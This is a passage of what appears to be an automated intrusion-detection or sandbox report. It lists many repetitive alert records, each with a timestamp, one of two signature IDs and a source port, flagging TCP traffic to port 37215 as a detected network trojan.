          Timestamp:06/09/24-16:33:15.540057
          SID:2829579
          Source Port:49174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818549
          SID:2835222
          Source Port:36374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606803
          SID:2835222
          Source Port:38046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120766
          SID:2835222
          Source Port:45518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078747
          SID:2829579
          Source Port:47084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468439
          SID:2835222
          Source Port:47976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033791
          SID:2829579
          Source Port:40380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599489
          SID:2835222
          Source Port:39362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102274
          SID:2835222
          Source Port:34818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603467
          SID:2835222
          Source Port:52104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993440
          SID:2835222
          Source Port:47410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914810
          SID:2835222
          Source Port:35728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929238
          SID:2835222
          Source Port:47496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028245
          SID:2835222
          Source Port:33284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820119
          SID:2829579
          Source Port:57332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243670
          SID:2829579
          Source Port:60664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028952
          SID:2829579
          Source Port:37266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413710
          SID:2829579
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682031
          SID:2829579
          Source Port:50962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169756
          SID:2829579
          Source Port:41804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287410
          SID:2835222
          Source Port:37276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226242
          SID:2829579
          Source Port:58996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996582
          SID:2829579
          Source Port:39510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398893
          SID:2829579
          Source Port:51060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417566
          SID:2835222
          Source Port:35234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162822
          SID:2829579
          Source Port:37144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415541
          SID:2835222
          Source Port:47768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274629
          SID:2835222
          Source Port:54378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.308877
          SID:2829579
          Source Port:36568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720955
          SID:2835222
          Source Port:58024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945506
          SID:2829579
          Source Port:53182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.085844
          SID:2829579
          Source Port:41938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606966
          SID:2835222
          Source Port:52800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563555
          SID:2829579
          Source Port:56190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248026
          SID:2835222
          Source Port:51998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557394
          SID:2835222
          Source Port:56236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104745
          SID:2829579
          Source Port:51378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246122
          SID:2835222
          Source Port:42542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413168
          SID:2835222
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596072
          SID:2829579
          Source Port:56310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041481
          SID:2835222
          Source Port:58616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716751
          SID:2835222
          Source Port:58146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719091
          SID:2835222
          Source Port:45094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915135
          SID:2829579
          Source Port:33764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205651
          SID:2835222
          Source Port:46970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224895
          SID:2829579
          Source Port:58120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398775
          SID:2829579
          Source Port:42588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869855
          SID:2835222
          Source Port:60590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292838
          SID:2835222
          Source Port:57124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990428
          SID:2835222
          Source Port:59054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157983
          SID:2835222
          Source Port:50218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986427
          SID:2829579
          Source Port:55892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558226
          SID:2829579
          Source Port:50480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644360
          SID:2829579
          Source Port:35658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414230
          SID:2835222
          Source Port:41096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246616
          SID:2829579
          Source Port:55596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.089501
          SID:2835222
          Source Port:45028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596988
          SID:2835222
          Source Port:40508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077616
          SID:2829579
          Source Port:33560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945984
          SID:2835222
          Source Port:52050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986283
          SID:2835222
          Source Port:51360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036083
          SID:2829579
          Source Port:58760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397536
          SID:2829579
          Source Port:49360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273623
          SID:2829579
          Source Port:41258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417784
          SID:2829579
          Source Port:52636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103836
          SID:2835222
          Source Port:51458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302498
          SID:2829579
          Source Port:43042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929274
          SID:2829579
          Source Port:41810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944914
          SID:2829579
          Source Port:35454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272608
          SID:2835222
          Source Port:43452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986579
          SID:2829579
          Source Port:38782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946942
          SID:2829579
          Source Port:38200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029855
          SID:2835222
          Source Port:35920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079555
          SID:2829579
          Source Port:57582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559740
          SID:2829579
          Source Port:43916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164365
          SID:2829579
          Source Port:59382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037449
          SID:2835222
          Source Port:40488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226508
          SID:2835222
          Source Port:39440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.293965
          SID:2829579
          Source Port:56054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168071
          SID:2829579
          Source Port:33788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890918
          SID:2835222
          Source Port:42562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167971
          SID:2829579
          Source Port:55038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278892
          SID:2835222
          Source Port:36766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861004
          SID:2835222
          Source Port:33078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902202
          SID:2829579
          Source Port:59584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720234
          SID:2835222
          Source Port:53818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287884
          SID:2829579
          Source Port:33170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931544
          SID:2835222
          Source Port:54176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904386
          SID:2829579
          Source Port:43460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915674
          SID:2829579
          Source Port:47188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288195
          SID:2829579
          Source Port:52432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658600
          SID:2835222
          Source Port:41066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490242
          SID:2829579
          Source Port:42290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646336
          SID:2829579
          Source Port:53644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474568
          SID:2829579
          Source Port:57202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.026893
          SID:2829579
          Source Port:50492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078538
          SID:2829579
          Source Port:33550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034646
          SID:2835222
          Source Port:37926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472163
          SID:2829579
          Source Port:54934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288056
          SID:2835222
          Source Port:42026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478013
          SID:2829579
          Source Port:50568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684577
          SID:2835222
          Source Port:59186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077668
          SID:2829579
          Source Port:52422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914765
          SID:2829579
          Source Port:46410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039039
          SID:2835222
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274566
          SID:2829579
          Source Port:40044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.476144
          SID:2829579
          Source Port:34694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823644
          SID:2835222
          Source Port:51758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162742
          SID:2829579
          Source Port:46026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920920
          SID:2835222
          Source Port:44858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397042
          SID:2829579
          Source Port:58458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948046
          SID:2829579
          Source Port:37370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418573
          SID:2829579
          Source Port:58312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012829
          SID:2829579
          Source Port:58852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821980
          SID:2835222
          Source Port:60834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987251
          SID:2829579
          Source Port:51318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818660
          SID:2835222
          Source Port:52598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.276697
          SID:2829579
          Source Port:57656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077133
          SID:2829579
          Source Port:60634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928872
          SID:2835222
          Source Port:50660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105285
          SID:2835222
          Source Port:48842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560286
          SID:2835222
          Source Port:60548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994694
          SID:2835222
          Source Port:58534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306384
          SID:2835222
          Source Port:51460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283607
          SID:2829579
          Source Port:37838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944684
          SID:2829579
          Source Port:37678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915965
          SID:2829579
          Source Port:33882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.644980
          SID:2835222
          Source Port:34658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559661
          SID:2829579
          Source Port:39818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490344
          SID:2829579
          Source Port:51428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249563
          SID:2829579
          Source Port:50002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645612
          SID:2829579
          Source Port:50520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472256
          SID:2829579
          Source Port:43636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944565
          SID:2835222
          Source Port:45830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998629
          SID:2835222
          Source Port:36384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162238
          SID:2835222
          Source Port:36702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165166
          SID:2835222
          Source Port:36086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945828
          SID:2829579
          Source Port:45764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557208
          SID:2835222
          Source Port:50892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944889
          SID:2835222
          Source Port:53662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034303
          SID:2835222
          Source Port:33646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925177
          SID:2835222
          Source Port:34178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206015
          SID:2835222
          Source Port:39474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397739
          SID:2829579
          Source Port:53614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646412
          SID:2835222
          Source Port:37484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412697
          SID:2835222
          Source Port:49604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075296
          SID:2835222
          Source Port:52942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867344
          SID:2829579
          Source Port:52256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987135
          SID:2829579
          Source Port:44788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418177
          SID:2835222
          Source Port:33250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467769
          SID:2835222
          Source Port:38824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036863
          SID:2835222
          Source Port:52864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082226
          SID:2829579
          Source Port:58862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076371
          SID:2829579
          Source Port:55700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928411
          SID:2829579
          Source Port:47464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412272
          SID:2835222
          Source Port:48010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296500
          SID:2829579
          Source Port:50058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.949021
          SID:2829579
          Source Port:57382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476777
          SID:2829579
          Source Port:35608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600881
          SID:2835222
          Source Port:46086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164834
          SID:2829579
          Source Port:39384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.128948
          SID:2835222
          Source Port:36428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.305151
          SID:2835222
          Source Port:46428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990298
          SID:2835222
          Source Port:59528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301317
          SID:2829579
          Source Port:42592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924415
          SID:2829579
          Source Port:34586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287456
          SID:2835222
          Source Port:57960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922008
          SID:2829579
          Source Port:58294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291549
          SID:2835222
          Source Port:51022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538669
          SID:2835222
          Source Port:60082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644144
          SID:2835222
          Source Port:44772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225210
          SID:2829579
          Source Port:38674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119692
          SID:2835222
          Source Port:45486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552422
          SID:2829579
          Source Port:39212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946442
          SID:2835222
          Source Port:39328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471679
          SID:2829579
          Source Port:60764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714927
          SID:2835222
          Source Port:45906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.284998
          SID:2835222
          Source Port:51486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928178
          SID:2829579
          Source Port:59138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914827
          SID:2835222
          Source Port:37908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286829
          SID:2829579
          Source Port:43068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032915
          SID:2835222
          Source Port:39820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.018046
          SID:2829579
          Source Port:43098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162431
          SID:2829579
          Source Port:40266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593736
          SID:2835222
          Source Port:32916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905368
          SID:2829579
          Source Port:49460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286481
          SID:2829579
          Source Port:48036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923825
          SID:2835222
          Source Port:34862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893095
          SID:2835222
          Source Port:44768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396442
          SID:2829579
          Source Port:47988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161930
          SID:2835222
          Source Port:36960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418934
          SID:2829579
          Source Port:59378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158067
          SID:2835222
          Source Port:47944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206598
          SID:2835222
          Source Port:60370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159610
          SID:2829579
          Source Port:60880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.648685
          SID:2829579
          Source Port:56530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476873
          SID:2835222
          Source Port:38164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561704
